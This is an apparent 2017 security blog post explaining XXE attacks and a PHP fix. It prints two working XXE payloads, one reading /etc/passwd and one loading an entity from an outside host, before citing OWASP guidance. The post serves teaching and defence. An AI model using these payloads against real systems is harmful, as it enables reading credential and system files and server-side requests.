March 3, 2017
XML External Entity (XXE) prevention
XML External Entity (XXE) attack is a very serious type of attack, which can have a huge impact on the security of an entire system [1]. Yet it is not widely known.
How does it work?
A lot of applications use XML as data-format to exchange data between two systems. This is a common practice - especially in the business world. What an attacker would do is inject malicious XML that requests an external entity. This can lead to information disclosure (yes even passwords), remote code execution, denial of service [1]. The code is executed as soon as the XML parser parses the input.
Information disclosure
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [
<!ELEMENT id ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<id>&xxe;</id>
This example sets an external entity to load the file contents of /etc/passwd which is loaded in <id>
RCE
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [
<!ELEMENT id ANY >
<!ENTITY xxe SYSTEM "http://mydomain.com/xxe/code.txt">
]>
<id>&xxe;</id>
Here our hosted file is loaded into the XML which could contain anything that you can imagine
“But the data is transmitted over TLS”
When using TLS, the body of your request is encrypted. So an attacker won't know if you are using XML and won't know the specifications of your interface. BUT for example in a mobile app, if you don't use certificate pinning, an attacker could easily analyse all the requests made to your server with a MITM and would now know that you are exchanging data with XML.
Solutions
PHP [2]:
//prevent XXE in XMLReader, SimpleXML, DOM libxml_disable_entity_loader(true);
As always: never trust the client and always validate incoming data!
Sources:
[1] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing[2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#PHP
Tags: php, security, xxe
« back
About the author
human, software engineer, tech enthusiast, security researcher
E-Mail: blog@cipher.digital
-----BEGIN PGP PUBLIC KEY BLOCK----- Version: OpenPGP (RSA-2048) xsBNBFjAYL4BCACsmBS6zE+0b7mZVtQhmfnRn3+IIQfT6WlE6izM39Q42yxj Hf2GOZU15Xc1x5RM9ZZx7HnMyTQWJMkwCzEba4Ju8dbn8gbFzLFp+mXAWQVJ NOhsLvt58X/k1nQ3HYaYAbJPFE4k89zlFUjBG+a1Qs0kNg5RkaSTcE4iV6L4 749LYRba1VFK1p3eIFmIh1zQnzwFY1WYJjvXHURZel8MA0BJTkmfOW4MRHZL lz8mjmTeWoRyxismRDprEtGynK7oIb3qUKAIr5MtoyESHBhVR+EpWHP0+06T IfOsrsp8maNztXRQRKZxHzNZj/ayGpxBGO19e0/6jNpWGI5Nflwo/oHbABEB AAHNI0RpZ2l0YWxDaXBoZXIgPGJsb2dAY2lwaGVyLmRpZ2l0YWw+wsByBBAB CAAmBQJYwGDQBgsJCAcDAgkQMsB3T2XG/XYEFQgCCgMWAgECGwMCHgEAAOzo B/4obbCU7u4f8kXQiaqAhSCjjyR5ZzdApPCh9i9XJ0qGTULTUuBrin1JDXSj HoiByL2mYh92+I8S+YMWLMiTQzl9O4wx+A0eDnfwbs5jKJSQt5Pc8NMlwWKU pG+R7escZ7le/qJYMgGPUWzFhgaKi8jueMW/NJSmPu/Tu4V9nhyxG9oaV3oP rF+W0bekP84tDJ477clRSSK9ZzjMbLL1PWuNmCd8Gsnd3fyP1WcadIMDrnBB sb+7AQ9eTywJ4Yzogh+cWjwy+TkkfEyCJ0X2n5WPURWc0YOFVqhcV4TYDR4v CHSbh+r7OVKIjqdQKDJwAUCYeSkePbxJYmzRoaTd2+RgzsBNBFjAYL4BCADE i8WrXxZWn42DlKDpnwTFBo/8asY4SJ22Zagkoj3cVvkechDWqQnWD753y5Xo gymfPnNjoQGmClDaQoZ29kC4kHTmBPICHCCLvV/7YVCZC4WPpSnpklbllmk7 S8WTnyEm09gniGyLVy5st6MYmFDB4VnfXpzVYtpyEOyIfGV+JmuT90L872xc +rI1/UuZA15k8M+ViD2xDlBMz3fbWxbt/KEUvbGoh2RW6SBJl1/z33ainQmO oqygZtHhoFybqf/OUAHzASPcy+E4byWBIqwDDumKWfsd1YYkUgPMIxEvNaU3 2Olh5+2HX1y8WAf5cIfXUDfmZ88HmWVVXAK9JjztABEBAAHCwF8EGAEIABMF AljAYNEJEDLAd09lxv12AhsMAACSqQf/Tz5KsfN3Yr82jXeO7jEWqI8yUaV2 vfK2JNfQXMIYDezIPxZU/sOOz9QF5gzHaLzt6moDQzHTZy9IE6q4l5gH1Wcm 1rX2b2b4ST3ThRzuDcfSCDZvUIAQ0WEBlXJZbCMwV8Rs5vsvv/CeXaT19zMb CGD+23A1dKDSDmnlycCSDlTK0dc4flc8qqsMAXXtV7F370L3r76GQGj/ap57 k8K5l8VOqNCU2E8PJ1nU3Kf0fpaPJCpmDp51iZB6Ndx7ujb3qCzt5ND0Nqpz 8wuA9uuzf7LdYsz6MdDo3u8cBYeT2KA2pOA6W1SJgSx62Z4hFZxS5nseW3al tfhqcXA+Ox3+gw== =GS1N -----END PGP PUBLIC KEY BLOCK-----